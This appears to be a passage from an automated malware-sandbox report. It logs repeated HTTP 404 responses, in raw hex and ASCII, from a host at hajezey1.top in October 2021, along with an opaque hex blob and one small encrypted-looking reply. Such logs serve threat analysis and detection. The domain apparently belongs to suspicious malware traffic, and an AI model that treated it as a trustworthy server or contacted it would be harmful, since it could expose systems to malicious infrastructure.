ab 63 10 ac f8 b9 9f 3a 48 93 9f 4e bd 44 ef 5a 89 4f dc ea c0 4a 00 97 af a4 57 25 11 bb d0 ea 85 62 4a 08 7d 54 7a 98 6c 39 c0 1e f3 5c d9 40 11 e6 cc 64 3d da 9a 56 3a 22 7d e6 d2 1b 62 b9 50 31 eb cd 14 26 15 8e b7 82 7f 8e 40 b6 f1 b8 4e a1 21 3b 88 4b 6e 47 f3 12 c3 b2 a5 83 41 ab 13 af b8 e8 81 63 a2 57 4a 60 87 bd 5f 6e 67 09 0f 8a ef 22 3b 6b 81 c7 86 7a 8e 12 d3 e4 dc 0e 7b d6 7d 00 2c 0f 7a d7 9b 48 0b ad 8b bc 08 85 f7 8f 82 42 b7 28 85 d8 da 14 79 a2 8e b9 08 c0 fe 77 c6 1d 2b 15 bf fa a5 e9 a8 b2 13 3b 35 02 1a 1b eb c2 f5 6c 8d e3 17 d3 83 6f ce ed 3f ec cf 81 68 73 02 99 ea a6 f5 c3 05 d0 b3 d3 23 39 41 c4 a5 c8 63 77 ca 0b 8f bd d9 39 6b a1 99 98 77 e8 0f 4e 8c da 06 bd 37 87 8c b4 26 b8 2c 58 b2 77 6c 08 d8 f9 d2 eb 48 25 66 34 2d 6f 77 5e a5 37 48 84 99 ff 67 37 f9 ad a1 97 3b 86 f3 bd 98 bb 1f 67 c7 26 e1 39 c6 86 8e f0 09 af 63 95 09 09 a8 1f 13 30 7b 32 cc c9 e1 ad c3 e5 0f 25 93 23 c4 1d d7 cf 8e 34 39 dc 46 77 58 dc be 91 98 3f d8 2c eb 53 43 a0 0c 97 e4 22 76 f9 14 f9 0b 64 82 93 64 4f 55 b4 ca 5e c3 d5 c0 88 0b 3d d9 1d 69 09 de ff 3d c1 03 70 2e 6f f4 d4 6a db a9 16 da
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:50:10 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:50:10 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 39 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f d2 9e 55 06 63 17 e5 ff dc fc be 1e b4 53 d9 63 ba 53 11 91 1d f4 0d 0a 30 0d 0a 0d 0a Data Ascii: 29I:82OUcScS0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:50:13 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:50:14 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:50:14 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:50:14 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:50:14 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:50:15 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:50:15 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:50:16 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:50:16 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:50:18 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found 